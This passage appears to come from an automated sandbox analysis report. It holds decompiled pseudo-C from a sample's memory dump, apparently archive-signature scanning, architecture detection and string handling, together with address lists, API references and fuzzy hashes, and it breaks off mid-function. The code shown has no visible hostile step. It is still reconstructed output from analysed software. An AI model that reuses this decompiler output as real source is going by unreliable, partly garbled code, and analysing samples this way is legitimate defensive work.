				signed int _v32;
				void* __edi;
				void* __ebp;
				signed int _t108;
				signed int _t109;
				signed int _t120;
				intOrPtr* _t123;
				void* _t124;
				signed int _t125;
				signed int _t127;
				void* _t128;
				void* _t130;
				signed int _t134;
				void* _t138;
				void* _t141;
				signed int _t150;
				void* _t159;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				signed int _t181;
				signed int _t182;
				signed int _t185;
				void* _t187;

				_t181 = _a4;
				_t182 = __ecx;
				E00418567(_t181);
				 *((intOrPtr*)(_t181 + 0xe8)) =  *((intOrPtr*)(__ecx + 0x40));
				 *((intOrPtr*)(_t181 + 0xec)) =  *((intOrPtr*)(__ecx + 0x44));
				 *((char*)(_t181 + 0xe0)) =  *((intOrPtr*)(__ecx + 0x56));
				_t150 = 0;
				 *((char*)(_t181 + 0xe1)) =  *((intOrPtr*)(__ecx + 0x57));
				if( *((intOrPtr*)(_t181 + 0xe0)) != 0) {
					L16:
					_t108 = 0;
					__eflags = 0;
					L17:
					_t109 = _t108 + 1;
					__eflags = _t109;
					return _t109;
				}
				_t176 =  *(__ecx + 0x5c);
				_v20 =  *((intOrPtr*)(__ecx + 0x60));
				_v12 =  *((intOrPtr*)(__ecx + 0x64));
				_v8 =  *((intOrPtr*)(__ecx + 0x68));
				_a4 =  *((intOrPtr*)(__ecx + 0x6c));
				asm("adc ecx, ebx");
				_v24 = _t176;
				 *((intOrPtr*)(_t181 + 0xf0)) =  *((intOrPtr*)(__ecx + 0x40)) + 0x20;
				 *((intOrPtr*)(_t181 + 0xf4)) =  *((intOrPtr*)(__ecx + 0x44));
				 *((intOrPtr*)(_t181 + 0x128)) = 0x20;
				 *((intOrPtr*)(_t181 + 0x12c)) = 0;
				 *((char*)(_t181 + 0x130)) = 0;
				_t185 = _v20;
				if(_t185 < 0 || _t185 <= 0 && _t176 < 0) {
					goto L16;
				} else {
					_t187 = _v8 - 0x40000000;
					if(_t187 > 0 || _t187 >= 0 && _v12 > _t150) {
						goto L16;
					} else {
						_t108 = _v12 | _v8;
						if(_t108 != 0) {
							__eflags =  *((intOrPtr*)(_t181 + 0x134)) - _t150;
							if( *((intOrPtr*)(_t181 + 0x134)) == _t150) {
								 *((char*)(_t181 + 0x130)) = 1;
							}
							asm("adc ecx, ebx");
							 *((intOrPtr*)(_t182 + 0x70)) =  *((intOrPtr*)(_t182 + 0x70)) + _v12 + 0x20;
							asm("adc [esi+0x74], ecx");
							_t120 = _v12 + _t176;
							_t177 = _v8;
							asm("adc edx, [ebp-0x10]");
							_v32 = _t120;
							asm("adc ecx, ebx");
							 *((intOrPtr*)(_t181 + 0x128)) = _t120 + 0x20;
							 *((intOrPtr*)(_t181 + 0x12c)) = _t177;
							_t159 =  *((intOrPtr*)(_t182 + 0x48)) -  *((intOrPtr*)(_t181 + 0xf0));
							asm("sbb eax, [edi+0xf4]");
							__eflags =  *((intOrPtr*)(_t182 + 0x4c)) - _t177;
							if(__eflags > 0) {
								L19:
								_t123 =  *_t182;
								_t124 =  *((intOrPtr*)( *_t123 + 0x10))(_t123, _v24, _v20, 1, _t150);
								__eflags = _t124 - _t150;
								if(_t124 != _t150) {
									return _t124;
								}
								_t125 = _v12;
								__eflags = _t125 - _t125;
								if(_t125 != _t125) {
									L22:
									return 0x8007000e;
								}
								__eflags = _t150 - _v8;
								if(_t150 == _v8) {
									_push(_v12);
									L0041C16C();
									_v32 = _t125;
									_t127 = E0041670E(_v12); // executed
									__eflags = _t127 - _t150;
									if(_t127 == _t150) {
										_t179 = _v12;
										_t163 = _v32;
										_t128 = E0041BCE0(_v32, _t179);
										__eflags = _t128 - _a4;
										if(_t128 == _a4) {
											L28:
											__eflags =  *((intOrPtr*)(_t181 + 0x134)) - _t150;
											if( *((intOrPtr*)(_t181 + 0x134)) == _t150) {
												 *((char*)(_t181 + 0x131)) = 1;
											}
											_push(_t150);
											_v20 = _t150;
											E004192D4( &_v24, _t182, _v32, _v12);
											_t163 =  *((intOrPtr*)(_t182 + 0x38));
											_v16 = _t150;
											_v12 = _t150;
											_v8 = _t150;
											_t130 = E00418FB1( *((intOrPtr*)(_t182 + 0x38)));
											__eflags = _t130 - 1;
											if(_t130 != 1) {
												L32:
												__eflags = _t130 - 0x17;
												if(_t130 != 0x17) {
													goto L27;
												}
												__eflags = _t179 - _t150;
												if(__eflags != 0) {
													goto L27;
												}
												_push(_a20);
												_push(_a16);
												_t163 = _t182;
												_push(_a12);
												_t134 = E0041A63E(_t182, _t179, __eflags,  *((intOrPtr*)(_t181 + 0xf0)),  *((intOrPtr*)(_t181 + 0xf4)), _t181 + 0x100,  &_v16, _a8);
												_a4 = _t134;
												__eflags = _t134 - _t150;
												if(_t134 == _t150) {
													__eflags = _v12 - _t150;
													if(_v12 != _t150) {
														__eflags = _v12 - 1;
														if(_v12 > 1) {
															goto L27;
														}
														E00418E1D( &_v24);
														E004192FE(_t182,  *_v16);
														_t163 =  *((intOrPtr*)(_t182 + 0x38));
														_t138 = E00418FB1( *((intOrPtr*)(_t182 + 0x38)));
														__eflags = _t138 - 1;
														if(_t138 != 1) {
															goto L27;
														}
														__eflags = _t179 - _t150;
														if(_t179 != _t150) {
															goto L27;
														}
														L41:
														 *((char*)(_t181 + 0x130)) = 1;
														 *((intOrPtr*)(_t181 + 0x120)) =  *((intOrPtr*)(_t182 + 0x70));
														 *((intOrPtr*)(_t181 + 0x124)) =  *((intOrPtr*)(_t182 + 0x74));
														_t141 = E0041A836(_t182, _t179, _t181, _a8, _a12, _a16, _a20);
														E0041969C( &_v16);
														E00418E1D( &_v24);
														_push(_v32);
														L0041C160();
														return _t141;
													}
													E0041969C( &_v16);
													E00418E1D( &_v24);
													L25:
													_push(_v32);
													L0041C160();
													return _t150;
												}
												E0041969C( &_v16);
												E00418E1D( &_v24);
												_t150 = _a4;
												goto L25;
											}
											__eflags = _t179 - _t150;
											if(_t179 == _t150) {
												goto L41;
											}
											goto L32;
										}
										L27:
										E00418DE4(_t163, _t181);
										goto L28;
									}
									_t150 = _t127;
									goto L25;
								}
								goto L22;
							} else {
								if(__eflags < 0) {
									L15:
									 *((char*)(_t181 + 0x133)) = 1;
									goto L16;
								}
								__eflags = _t159 - _v32;
								if(_t159 >= _v32) {
									goto L19;
								}
								goto L15;
							}
						}
						if((_t176 | _v20) != 0) {
							goto L17;
						}
						 *((char*)(_t181 + 0x130)) = 1;
						return _t108;
					}
				}
			}
































                                          0x0041ae0b
                                          0x0041ae0e
                                          0x0041ae12
                                          0x0041ae1a
                                          0x0041ae23
                                          0x0041ae2c
                                          0x0041ae35
                                          0x0041ae37
                                          0x0041ae43
                                          0x0041af36
                                          0x0041af36
                                          0x0041af36
                                          0x0041af38
                                          0x0041af38
                                          0x0041af38
                                          0x00000000
                                          0x0041af38
                                          0x0041ae4f
                                          0x0041ae52
                                          0x0041ae58
                                          0x0041ae5e
                                          0x0041ae64
                                          0x0041ae6d
                                          0x0041ae6f
                                          0x0041ae72
                                          0x0041ae78
                                          0x0041ae7e
                                          0x0041ae88
                                          0x0041ae8e
                                          0x0041ae94
                                          0x0041ae97
                                          0x00000000
                                          0x0041aea7
                                          0x0041aea7
                                          0x0041aeae
                                          0x00000000
                                          0x0041aebb
                                          0x0041aebe
                                          0x0041aec1
                                          0x0041aed1
                                          0x0041aed7
                                          0x0041aed9
                                          0x0041aed9
                                          0x0041aee9
                                          0x0041aeeb
                                          0x0041aef1
                                          0x0041aef4
                                          0x0041aef6
                                          0x0041aef9
                                          0x0041aefc
                                          0x0041af04
                                          0x0041af06
                                          0x0041af0c
                                          0x0041af15
                                          0x0041af1e
                                          0x0041af24
                                          0x0041af26
                                          0x0041af40
                                          0x0041af40
                                          0x0041af4e
                                          0x0041af51
                                          0x0041af53
                                          0x0041af3d
                                          0x0041af3d
                                          0x0041af55
                                          0x0041af58
                                          0x0041af5a
                                          0x0041af61
                                          0x00000000
                                          0x0041af61
                                          0x0041af5c
                                          0x0041af5f
                                          0x0041af68
                                          0x0041af6b
                                          0x0041af78
                                          0x0041af7b
                                          0x0041af80
                                          0x0041af82
                                          0x0041af93
                                          0x0041af96
                                          0x0041af99
                                          0x0041af9e
                                          0x0041afa1
                                          0x0041afa8
                                          0x0041afa8
                                          0x0041afae
                                          0x0041afb0
                                          0x0041afb0
                                          0x0041afb7
                                          0x0041afc1
                                          0x0041afc6
                                          0x0041afcb
                                          0x0041afce
                                          0x0041afd1
                                          0x0041afd4
                                          0x0041afd7
                                          0x0041afdc
                                          0x0041afdf
                                          0x0041afe9
                                          0x0041afe9
                                          0x0041afec
                                          0x00000000
                                          0x00000000
                                          0x0041afee
                                          0x0041aff0
                                          0x00000000
                                          0x00000000
                                          0x0041aff2
                                          0x0041aff8
                                          0x0041affb
                                          0x0041affd
                                          0x0041b017
                                          0x0041b01c
                                          0x0041b01f
                                          0x0041b021
                                          0x0041b03b
                                          0x0041b03e
                                          0x0041b055
                                          0x0041b059
                                          0x00000000
                                          0x00000000
                                          0x0041b062
                                          0x0041b070
                                          0x0041b075
                                          0x0041b078
                                          0x0041b07d
                                          0x0041b080
                                          0x00000000
                                          0x00000000
                                          0x0041b086
                                          0x0041b088
                                          0x00000000
                                          0x00000000
                                          0x0041b08e
                                          0x0041b091
                                          0x0041b0a1
                                          0x0041b0b0
                                          0x0041b0b6
                                          0x0041b0c0
                                          0x0041b0c8
                                          0x0041b0cd
                                          0x0041b0d0
                                          0x00000000
                                          0x0041b0d6
                                          0x0041b043
                                          0x0041b04b
                                          0x0041af86
                                          0x0041af86
                                          0x0041af89
                                          0x00000000
                                          0x0041af8f
                                          0x0041b026
                                          0x0041b02e
                                          0x0041b033
                                          0x00000000
                                          0x0041b033
                                          0x0041afe1
                                          0x0041afe3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041afe3
                                          0x0041afa3
                                          0x0041afa3
                                          0x00000000
                                          0x0041afa3
                                          0x0041af84
                                          0x00000000
                                          0x0041af84
                                          0x00000000
                                          0x0041af28
                                          0x0041af28
                                          0x0041af2f
                                          0x0041af2f
                                          0x00000000
                                          0x0041af2f
                                          0x0041af2a
                                          0x0041af2d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af2d
                                          0x0041af26
                                          0x0041aec6
                                          0x00000000
                                          0x00000000
                                          0x0041aec8
                                          0x00000000
                                          0x0041aec8
                                          0x0041aeae

                                          APIs
                                            • Part of subcall function 00418567: ??3@YAXPAX@Z.MSVCRT ref: 00418597
                                            • Part of subcall function 00418567: ??3@YAXPAX@Z.MSVCRT ref: 004185A8
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0041AF6B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041AF89
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041B0D0
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID:
                                          • API String ID: 4113381792-0
                                          • Opcode ID: 14294f3c755af606902697db63c7011c104d95f9aac323c79cc22e6ace76d4ad
                                          • Instruction ID: 7441eaed24261cedb068acf738b6ac121ac43d6cfe962bcb2839a80aef5be465
                                          • Opcode Fuzzy Hash: 14294f3c755af606902697db63c7011c104d95f9aac323c79cc22e6ace76d4ad
                                          • Instruction Fuzzy Hash: 4C918C70A01606AFCF25DFA4C590AEEFBB1BF08304F10452EE45593311D779AAA1CB9A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419328, Relevance: 4.6, APIs: 3, Instructions: 150COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00419328(void* __ecx, void* __eflags, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				void* __esi;
				signed int _t44;
				void* _t46;
				intOrPtr* _t48;
				signed int _t49;
				void* _t50;
				signed int _t53;
				signed int _t54;
				void* _t56;
				intOrPtr* _t58;
				void* _t60;
				signed int _t64;
				signed int _t66;
				signed int _t69;
				signed int _t73;
				signed int _t81;
				signed int _t84;
				void* _t85;
				void* _t88;
				void* _t98;
				signed int _t101;
				void* _t103;
				signed int _t105;
				void* _t106;
				void* _t107;

				_t60 = __ecx;
				_t98 = __ecx + 0x50;
				_t44 = E0041670E(0x20); // executed
				if(_t44 == 0) {
					if(E00419037(_t98) == 0) {
						_t46 = _a8;
						__eflags = _t46;
						if(_t46 == 0) {
							L7:
							_push(0x8000); // executed
							L0041C16C(); // executed
							_v24 = _v24 & 0x00000000;
							_t7 =  &_v20;
							 *_t7 = _v20 & 0x00000000;
							__eflags =  *_t7;
							_t88 = _t46;
							_v12 = _t88;
							_t64 = 8;
							memcpy(_t88, _t98, _t64 << 2);
							_t107 = _t106 + 0xc;
							while(1) {
								_t66 = _a8;
								_t81 = 0x7fe0;
								__eflags = _t66;
								if(_t66 == 0) {
									goto L13;
								}
								_t53 =  *_t66 - _v24;
								asm("sbb ecx, [ebp-0x10]");
								__eflags =  *(_t66 + 4);
								if(__eflags > 0) {
									goto L13;
								} else {
									if(__eflags < 0) {
										L12:
										_t81 = _t53;
										__eflags = _t53;
										if(_t53 == 0) {
											L30:
											_t101 = 1;
											__eflags = 1;
										} else {
											goto L13;
										}
									} else {
										__eflags = _t53 - 0x7fe0;
										if(_t53 >= 0x7fe0) {
											goto L13;
										} else {
											goto L12;
										}
									}
								}
								L31:
								_push(_v12);
								L0041C160();
								_t44 = _t101;
								goto L3;
								L13:
								_t48 = _a4;
								_v8 = _v8 & 0x00000000;
								_t49 =  *((intOrPtr*)( *_t48 + 0xc))(_t48, _v12 + 0x20, _t81,  &_v8);
								__eflags = _t49;
								if(_t49 != 0) {
									L33:
									_t101 = _t49;
								} else {
									_t69 = _v8;
									__eflags = _t69;
									if(_t69 == 0) {
										goto L30;
									} else {
										_t84 = 0;
										__eflags = 0;
										while(1) {
											_t50 = _v12;
											_t103 = _t50 + _t84 + 1;
											_t85 = _t50 + _t69;
											__eflags = _t103 - _t85;
											if(_t103 > _t85) {
												break;
											} else {
												goto L17;
											}
											while(1) {
												L17:
												__eflags =  *_t103 - 0x37;
												if( *_t103 == 0x37) {
													break;
												}
												__eflags =  *(_t103 + 1) - 0x37;
												if( *(_t103 + 1) == 0x37) {
													_t103 = _t103 + 1;
												} else {
													__eflags =  *(_t103 + 2) - 0x37;
													if( *(_t103 + 2) == 0x37) {
														_t103 = _t103 + 2;
													} else {
														__eflags =  *(_t103 + 3) - 0x37;
														if( *(_t103 + 3) == 0x37) {
															_t103 = _t103 + 3;
															__eflags = _t103;
														} else {
															_t103 = _t103 + 4;
															__eflags = _t103 - _t85;
															if(_t103 <= _t85) {
																continue;
															} else {
															}
														}
													}
												}
												break;
											}
											__eflags = _t103 - _t85;
											if(_t103 > _t85) {
												break;
											} else {
												_v16 = _t103 - _t50;
												_t54 = E00419037(_t103);
												__eflags = _t54;
												if(_t54 != 0) {
													_t73 = 8;
													_t56 = memcpy(_t60 + 0x50, _t103, _t73 << 2);
													asm("adc ecx, [ebp-0x10]");
													 *((intOrPtr*)(_t60 + 0x40)) =  *((intOrPtr*)(_t60 + 0x40)) + _t56 + _v24;
													_t58 = _a4;
													asm("adc [ebx+0x44], ecx");
													_t105 =  *((intOrPtr*)(_t60 + 0x40)) + 0x20;
													__eflags = _t105;
													asm("adc edi, ecx");
													_t49 =  *((intOrPtr*)( *_t58 + 0x10))(_t58, _t105,  *((intOrPtr*)(_t60 + 0x44)), 0, 0);
													goto L33;
												} else {
													_t69 = _v8;
													_t84 = _v16;
													continue;
												}
											}
											goto L31;
										}
										_v24 = _v24 + _t69;
										asm("adc dword [ebp-0x10], 0x0");
										memmove(_t50, _t50 + _t69, 0x20);
										_t107 = _t107 + 0xc;
										continue;
									}
								}
								goto L31;
							}
						} else {
							__eflags =  *_t46 |  *(_t46 + 4);
							if(( *_t46 |  *(_t46 + 4)) != 0) {
								goto L7;
							} else {
								_t44 = 1;
							}
						}
					} else {
						_t44 = 0;
					}
				}
				L3:
				return _t44;
			}

































                                          0x0041932f
                                          0x00419335
                                          0x0041933c
                                          0x00419343
                                          0x0041934c
                                          0x00419356
                                          0x00419359
                                          0x0041935b
                                          0x00419369
                                          0x0041936a
                                          0x0041936f
                                          0x00419374
                                          0x00419378
                                          0x00419378
                                          0x00419378
                                          0x0041937d
                                          0x00419381
                                          0x00419384
                                          0x00419385
                                          0x00419385
                                          0x0041938c
                                          0x0041938c
                                          0x0041938f
                                          0x00419391
                                          0x00419393
                                          0x00000000
                                          0x00000000
                                          0x00419397
                                          0x0041939d
                                          0x004193a0
                                          0x004193a2
                                          0x00000000
                                          0x004193a4
                                          0x004193a4
                                          0x004193aa
                                          0x004193aa
                                          0x004193ac
                                          0x004193ae
                                          0x0041944e
                                          0x00419450
                                          0x00419450
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004193a6
                                          0x004193a6
                                          0x004193a8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004193a8
                                          0x004193a4
                                          0x00419451
                                          0x00419451
                                          0x00419454
                                          0x0041945a
                                          0x00000000
                                          0x004193b4
                                          0x004193b4
                                          0x004193b9
                                          0x004193ca
                                          0x004193cd
                                          0x004193cf
                                          0x00419495
                                          0x00419495
                                          0x004193d5
                                          0x004193d5
                                          0x004193d8
                                          0x004193da
                                          0x00000000
                                          0x004193dc
                                          0x004193dc
                                          0x004193dc
                                          0x004193de
                                          0x004193de
                                          0x004193e1
                                          0x004193e5
                                          0x004193e8
                                          0x004193ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004193ec
                                          0x004193ec
                                          0x004193ec
                                          0x004193ef
                                          0x00000000
                                          0x00000000
                                          0x004193f1
                                          0x004193f5
                                          0x0041940c
                                          0x004193f7
                                          0x004193f7
                                          0x004193fb
                                          0x0041940f
                                          0x004193fd
                                          0x004193fd
                                          0x00419401
                                          0x00419414
                                          0x00419414
                                          0x00419403
                                          0x00419403
                                          0x00419406
                                          0x00419408
                                          0x00000000
                                          0x00000000
                                          0x0041940a
                                          0x00419408
                                          0x00419401
                                          0x004193fb
                                          0x00000000
                                          0x004193f5
                                          0x00419417
                                          0x00419419
                                          0x00000000
                                          0x0041941b
                                          0x0041941f
                                          0x00419422
                                          0x00419427
                                          0x00419429
                                          0x00419467
                                          0x0041946b
                                          0x00419472
                                          0x00419475
                                          0x0041947b
                                          0x0041947e
                                          0x00419489
                                          0x00419489
                                          0x0041948d
                                          0x00419492
                                          0x00000000
                                          0x0041942b
                                          0x0041942b
                                          0x0041942e
                                          0x00000000
                                          0x0041942e
                                          0x00419429
                                          0x00000000
                                          0x00419419
                                          0x00419433
                                          0x00419438
                                          0x00419440
                                          0x00419446
                                          0x00000000
                                          0x00419446
                                          0x004193da
                                          0x00000000
                                          0x004193cf
                                          0x0041935d
                                          0x0041935f
                                          0x00419362
                                          0x00000000
                                          0x00419364
                                          0x00419366
                                          0x00419366
                                          0x00419362
                                          0x0041934e
                                          0x0041934e
                                          0x0041934e
                                          0x0041934c
                                          0x00419350
                                          0x00419353

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@memmove
                                          • String ID:
                                          • API String ID: 3828600508-0
                                          • Opcode ID: 8d053accfe509be5929954659669d5975b446d1ab699fc877be82360f8aa2e9f
                                          • Instruction ID: e12da01f2eb493b1a38a8d6fc4e21457148e6801041be196bfadcbe32c4ccdd3
                                          • Opcode Fuzzy Hash: 8d053accfe509be5929954659669d5975b446d1ab699fc877be82360f8aa2e9f
                                          • Instruction Fuzzy Hash: A051D471E04115ABEF28CA54C864AEF77B5AF49304F14806EDC1AA7381D779ED82C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404D7F, Relevance: 4.6, APIs: 3, Instructions: 139COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00404D7F(intOrPtr __ecx, intOrPtr* __edx, void* __eflags) {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v32;
				char _v44;
				char _v56;
				void* _t46;
				void* _t54;
				char** _t61;
				void* _t67;
				char** _t74;
				void* _t79;
				char* _t102;
				char* _t105;
				intOrPtr* _t107;
				char** _t108;
				char** _t109;

				_t107 = __edx;
				_v8 = __ecx;
				_t46 = E00403ECA(); // executed
				if(_t46 == 0) {
					_v20 = "x86";
					_v16 = "i386";
					goto L5;
				} else {
					_t114 = _t46 - 9;
					if(_t46 == 9) {
						_v20 = "x64";
						_v16 = "amd64";
						L5:
						_v12 = 0;
					} else {
						_v20 = 0;
					}
				}
				E004143C2(E004143C2(E004143C2(_t46,  &_v56),  &_v44),  &_v32);
				_t79 = 0;
				E00403F60(0, 0,  &_v56,  &_v44);
				_t54 = E004030D6(_v8, _v56, _t114, _v44,  &_v32); // executed
				if(_t54 != 0) {
					_t79 = 1;
				}
				E0041447C(_t107,  &_v32);
				_t102 = _v20;
				_t108 =  &_v20;
				while(1) {
					_push( &_v44);
					_push( &_v56);
					_t117 = _t102;
					if(_t102 == 0) {
						break;
					}
					E00403F60(0, _t102);
					_t61 = E004030D6(_v8, _v56, __eflags, _v44,  &_v32); // executed
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *(_t107 + 4);
						if(__eflags != 0) {
							E004144C5(_t107, "\r\n");
						}
						E004144FB(_t107, __eflags,  &_v32);
						_t79 = 1;
					}
					_t108 =  &(_t108[1]);
					__eflags = _t108;
					_t102 =  *_t108;
				}
				E00403F60( *0x422730 & 0x0000ffff, _t102);
				_t67 = E004030D6(_v8, _v56, _t117, _v44,  &_v32); // executed
				_t118 = _t67;
				if(_t67 != 0) {
					_t79 = 1;
				}
				E004144FB(_t107, _t118,  &_v32);
				_t105 = _v20;
				_t109 =  &_v20;
				while(_t105 != 0) {
					E00403F60( *0x422730 & 0x0000ffff, _t105,  &_v56,  &_v44);
					_t74 = E004030D6(_v8, _v56, __eflags, _v44,  &_v32); // executed
					__eflags = _t74;
					if(_t74 != 0) {
						__eflags =  *(_t107 + 4);
						if(__eflags != 0) {
							E004144C5(_t107, "\r\n");
						}
						E004144FB(_t107, __eflags,  &_v32);
						_t79 = 1;
					}
					_t109 =  &(_t109[1]);
					__eflags = _t109;
					_t105 =  *_t109;
				}
				_push(_v32);
				L0041C160();
				_push(_v44);
				L0041C160();
				_push(_v56);
				L0041C160();
				return _t79;
			}





















                                          0x00404d88
                                          0x00404d8a
                                          0x00404d8d
                                          0x00404d96
                                          0x00404db2
                                          0x00404db9
                                          0x00000000
                                          0x00404d98
                                          0x00404d98
                                          0x00404d9b
                                          0x00404da2
                                          0x00404da9
                                          0x00404dc0
                                          0x00404dc0
                                          0x00404d9d
                                          0x00404d9d
                                          0x00404d9d
                                          0x00404d9b
                                          0x00404dd6
                                          0x00404de7
                                          0x00404de9
                                          0x00404dfb
                                          0x00404e02
                                          0x00404e04
                                          0x00404e04
                                          0x00404e0c
                                          0x00404e11
                                          0x00404e14
                                          0x00404e5a
                                          0x00404e5d
                                          0x00404e61
                                          0x00404e62
                                          0x00404e64
                                          0x00000000
                                          0x00000000
                                          0x00404e1b
                                          0x00404e2d
                                          0x00404e32
                                          0x00404e34
                                          0x00404e36
                                          0x00404e3a
                                          0x00404e43
                                          0x00404e43
                                          0x00404e4e
                                          0x00404e53
                                          0x00404e53
                                          0x00404e55
                                          0x00404e55
                                          0x00404e58
                                          0x00404e58
                                          0x00404e6d
                                          0x00404e7f
                                          0x00404e84
                                          0x00404e86
                                          0x00404e88
                                          0x00404e88
                                          0x00404e90
                                          0x00404e95
                                          0x00404e98
                                          0x00404eeb
                                          0x00404eac
                                          0x00404ebe
                                          0x00404ec3
                                          0x00404ec5
                                          0x00404ec7
                                          0x00404ecb
                                          0x00404ed4
                                          0x00404ed4
                                          0x00404edf
                                          0x00404ee4
                                          0x00404ee4
                                          0x00404ee6
                                          0x00404ee6
                                          0x00404ee9
                                          0x00404ee9
                                          0x00404eef
                                          0x00404ef2
                                          0x00404ef7
                                          0x00404efa
                                          0x00404eff
                                          0x00404f02
                                          0x00404f10

                                          APIs
                                            • Part of subcall function 00403ECA: GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 00403EDB
                                            • Part of subcall function 00403ECA: GetNativeSystemInfo.KERNELBASE(?,?,?,00403EFA,004060E6,00000001,00000001,00000000,?,00000000), ref: 00403EE9
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404EF2
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404EFA
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404F02
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$AddressInfoNativeProcSystem
                                          • String ID:
                                          • API String ID: 3731959171-0
                                          • Opcode ID: e7913fd9b2038a61d425995d58e570c61fc8ac8ba1c02f671b2581e736df3aa8
                                          • Instruction ID: 22c72f549c8d9d607ce2050e0226bf1ce9e8af4da17dc6dbc20fb89fd3f62798
                                          • Opcode Fuzzy Hash: e7913fd9b2038a61d425995d58e570c61fc8ac8ba1c02f671b2581e736df3aa8
                                          • Instruction Fuzzy Hash: 164132B1E0110EAACF04EF95C8819EFB77ABF84308F14412BE51577295DB3C5A46CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414864, Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00414864(void** __ecx, void* _a4) {
				void* _t20;
				signed int _t31;
				void** _t33;
				void* _t34;
				void* _t35;
				void* _t40;

				_t35 = _a4;
				_t34 = 0;
				_t33 = __ecx;
				if( *_t35 != 0) {
					do {
						_t34 = _t34 + 1;
					} while ( *((short*)(_t35 + _t34 * 2)) != 0);
				}
				_t40 = _t34 - _t33[2];
				if(_t40 > 0) {
					_t31 = 2;
					_t20 = (_t34 + 1) * _t31;
					_push( ~(0 | _t40 > 0x00000000) | _t20); // executed
					L0041C16C(); // executed
					_push( *_t33);
					L0041C160();
					 *_t33 = _t20;
					_t33[2] = _t34;
				}
				_t33[1] = _t34;
				memcpy( *_t33, _t35, _t34 + _t34 + 2);
				return _t33;
			}









                                          0x00414865
                                          0x0041486a
                                          0x0041486d
                                          0x00414873
                                          0x00414875
                                          0x00414875
                                          0x00414876
                                          0x00414875
                                          0x0041487e
                                          0x00414881
                                          0x00414888
                                          0x0041488c
                                          0x00414895
                                          0x00414896
                                          0x0041489b
                                          0x0041489f
                                          0x004148a6
                                          0x004148a8
                                          0x004148ab
                                          0x004148b4
                                          0x004148b7
                                          0x004148c4

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@memcpy
                                          • String ID:
                                          • API String ID: 1695611338-0
                                          • Opcode ID: 9ab0973ae346b82445c8537c449f14d5ae802d9cb0ee503312eee215456cf9cc
                                          • Instruction ID: 41b234041f6f91087d42b0e57e97fd4fa0d4009db4bb1be59154aa6f59a166d2
                                          • Opcode Fuzzy Hash: 9ab0973ae346b82445c8537c449f14d5ae802d9cb0ee503312eee215456cf9cc
                                          • Instruction Fuzzy Hash: A4F028776402157BC714AF66DC4189BF7B8FB84750B10C53FF11983241E774E8908B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004030D6, Relevance: 3.9, APIs: 3, Instructions: 125stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E004030D6(intOrPtr* __ecx, CHAR* __edx, void* __eflags, CHAR* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				CHAR* _v32;
				int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr* _v52;
				void _v4148;
				intOrPtr* _t66;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr* _t81;
				char _t83;
				intOrPtr* _t86;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t99;
